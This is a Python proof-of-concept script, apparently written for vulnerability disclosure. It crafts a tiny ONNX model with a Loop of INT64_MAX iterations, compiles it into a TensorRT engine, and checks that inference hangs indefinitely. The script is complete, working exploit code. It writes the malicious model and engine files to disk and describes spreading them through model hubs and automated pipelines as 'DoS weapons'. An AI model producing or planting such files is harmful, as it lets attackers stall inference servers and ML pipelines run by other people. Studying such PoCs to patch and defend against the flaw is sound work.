""" VULN-003 PoC: TensorRT Denial of Service via ONNX Loop with INT64_MAX Iterations A crafted ONNX model (338 bytes) containing a Loop operator with max_trip_count set to INT64_MAX (9,223,372,036,854,775,807) compiles into a valid TensorRT engine (20,252 bytes) that hangs indefinitely during inference. Attack vectors: 1. ONNX model on model hub -> victim compiles to engine -> inference hangs 2. Pre-compiled engine file on model hub -> victim loads -> inference hangs 3. Automated ML pipeline ingests malicious model -> entire pipeline stalls Impact: - Permanent denial of service for TensorRT inference servers - No timeout mechanism in execute_async_v3() — hangs until process is killed - Tiny file size (338 bytes ONNX / 20KB engine) makes distribution trivial - Affects Triton Inference Server, TensorRT-LLM, any TRT-based pipeline """ import os import sys import time import subprocess import numpy as np import onnx from onnx import helper, TensorProto, numpy_helper POC_DIR = os.path.dirname(os.path.abspath(__file__)) def create_loop_dos_model(): """Create minimal ONNX model with Loop(INT64_MAX).""" # Loop body: Relu (trivial computation) body_input = helper.make_tensor_value_info('i', TensorProto.INT64, []) body_cond_in = helper.make_tensor_value_info('cond_in', TensorProto.BOOL, []) body_x_in = helper.make_tensor_value_info('x_in', TensorProto.FLOAT, [1, 4]) body_cond_out = helper.make_tensor_value_info('cond_out', TensorProto.BOOL, []) body_x_out = helper.make_tensor_value_info('x_out', TensorProto.FLOAT, [1, 4]) relu = helper.make_node('Relu', ['x_in'], ['x_out']) identity_cond = helper.make_node('Identity', ['cond_in'], ['cond_out']) body = helper.make_graph( [relu, identity_cond], 'loop_body', [body_input, body_cond_in, body_x_in], [body_cond_out, body_x_out] ) # Main graph X = helper.make_tensor_value_info('input', TensorProto.FLOAT, [1, 4]) Y = helper.make_tensor_value_info('output', TensorProto.FLOAT, [1, 4]) # INT64_MAX = 9,223,372,036,854,775,807 max_trip = numpy_helper.from_array( np.array(0x7FFFFFFFFFFFFFFF, dtype=np.int64), 'max_trip' ) cond_init = numpy_helper.from_array(np.array(True, dtype=bool), 'cond_init') loop = helper.make_node( 'Loop', ['max_trip', 'cond_init', 'input'], ['output'], body=body ) graph = helper.make_graph([loop], 'loop_dos', [X], [Y], [max_trip, cond_init]) model = helper.make_model(graph, opset_imports=[helper.make_opsetid('', 13)]) model.ir_version = 7 return model def build_engine(model_path, engine_path): """Build TensorRT engine from ONNX model.""" import tensorrt as trt logger = trt.Logger(trt.Logger.WARNING) builder = trt.Builder(logger) network = builder.create_network( 1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH) ) parser = trt.OnnxParser(network, logger) if not parser.parse_from_file(model_path): for i in range(parser.num_errors): print(f" Parse error: {parser.get_error(i)}") return False config = builder.create_builder_config() config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 1 << 24) serialized = builder.build_serialized_network(network, config) if not serialized: print(" Build failed") return False with open(engine_path, 'wb') as f: f.write(bytes(serialized)) return True def test_inference_subprocess(engine_path, timeout=30): """Run inference in subprocess and measure hang time.""" script = f''' import tensorrt as trt, numpy as np, torch, time, sys with open(r"{engine_path}", "rb") as f: data = f.read() logger = trt.Logger(trt.Logger.ERROR) runtime = trt.Runtime(logger) engine = runtime.deserialize_cuda_engine(data) if not engine: print("DESER_FAIL") sys.exit(1) context = engine.create_execution_context() device = torch.device("cuda:0") inp = torch.randn(1, 4, device=device) out = torch.empty(1, 4, device=device) context.set_tensor_address("input", inp.data_ptr()) context.set_tensor_address("output", out.data_ptr()) stream = torch.cuda.current_stream() print("INFERENCE_STARTED") sys.stdout.flush() start = time.time() context.execute_async_v3(stream.cuda_stream) stream.synchronize() elapsed = time.time() - start print(f"INFERENCE_DONE time={{elapsed:.1f}}s") ''' start = time.time() try: r = subprocess.run( [sys.executable, "-c", script], capture_output=True, text=True, timeout=timeout ) elapsed = time.time() - start return False, elapsed, r.stdout.strip(), r.returncode except subprocess.TimeoutExpired: elapsed = time.time() - start return True, elapsed, "TIMEOUT", -1 def main(): print("=" * 70) print("VULN-003: TensorRT Inference DoS via ONNX Loop(INT64_MAX)") print("=" * 70) # Step 1: Create malicious ONNX model model = create_loop_dos_model() onnx_path = os.path.join(POC_DIR, "dos_loop.onnx") with open(onnx_path, 'wb') as f: f.write(model.SerializeToString()) onnx_size = os.path.getsize(onnx_path) print(f"\n[1] Malicious ONNX model: {onnx_path}") print(f" Size: {onnx_size} bytes") print(f" Loop max_trip_count: {0x7FFFFFFFFFFFFFFF:,} (INT64_MAX)") print(f" Loop body: single Relu operation") # Step 2: Build TensorRT engine engine_path = os.path.join(POC_DIR, "dos_loop.engine") print(f"\n[2] Building TensorRT engine...") if not build_engine(onnx_path, engine_path): print(" ERROR: Engine build failed") sys.exit(1) engine_size = os.path.getsize(engine_path) print(f" Engine: {engine_path}") print(f" Size: {engine_size} bytes") print(f" Build completed normally — no error, no warning") # Step 3: Baseline — normal model inference print(f"\n[3] Baseline: Normal model inference") baseline_onnx = os.path.join(POC_DIR, "normal_loop.onnx") # Normal loop with 10 iterations body_input = helper.make_tensor_value_info('i', TensorProto.INT64, []) body_cond_in = helper.make_tensor_value_info('cond_in', TensorProto.BOOL, []) body_x_in = helper.make_tensor_value_info('x_in', TensorProto.FLOAT, [1, 4]) body_cond_out = helper.make_tensor_value_info('cond_out', TensorProto.BOOL, []) body_x_out = helper.make_tensor_value_info('x_out', TensorProto.FLOAT, [1, 4]) relu = helper.make_node('Relu', ['x_in'], ['x_out']) id_cond = helper.make_node('Identity', ['cond_in'], ['cond_out']) body = helper.make_graph([relu, id_cond], 'body', [body_input, body_cond_in, body_x_in], [body_cond_out, body_x_out]) X = helper.make_tensor_value_info('input', TensorProto.FLOAT, [1, 4]) Y = helper.make_tensor_value_info('output', TensorProto.FLOAT, [1, 4]) trip = numpy_helper.from_array(np.array(10, dtype=np.int64), 'max_trip') cond = numpy_helper.from_array(np.array(True, dtype=bool), 'cond_init') loop = helper.make_node('Loop', ['max_trip', 'cond_init', 'input'], ['output'], body=body) graph = helper.make_graph([loop], 'normal', [X], [Y], [trip, cond]) normal_model = helper.make_model(graph, opset_imports=[helper.make_opsetid('', 13)]) normal_model.ir_version = 7 with open(baseline_onnx, 'wb') as f: f.write(normal_model.SerializeToString()) baseline_engine = os.path.join(POC_DIR, "normal_loop.engine") build_engine(baseline_onnx, baseline_engine) hung, elapsed, out, rc = test_inference_subprocess(baseline_engine, timeout=15) print(f" Normal model (10 iterations): {out} ({elapsed:.1f}s)") # Step 4: DoS inference print(f"\n[4] DoS inference (will hang for 30 seconds then be killed)") hung, elapsed, out, rc = test_inference_subprocess(engine_path, timeout=30) if hung: print(f" TIMEOUT after {elapsed:.1f}s — INFERENCE IS HANGING") print(f" [!!!] DoS CONFIRMED") else: print(f" Inference completed: {out} ({elapsed:.1f}s)") # Summary print(f"\n{'='*70}") print("VULNERABILITY SUMMARY") print(f"{'='*70}") print(f"[!!!] TensorRT inference hangs indefinitely on Loop(INT64_MAX)") print(f"[!!!] ONNX model size: {onnx_size} bytes") print(f"[!!!] Engine file size: {engine_size} bytes") print(f"[!!!] Both formats can be used as DoS weapons") print(f"[!!!] No timeout in execute_async_v3() — runs until process killed") print(f"[!!!] Loop iterations: 9,223,372,036,854,775,807 (INT64_MAX)") print(f"[!!!] Even at 1 billion iterations/sec, would take 292 YEARS") # Cleanup temp files for f in [baseline_onnx, baseline_engine]: if os.path.exists(f): os.remove(f) if __name__ == "__main__": main()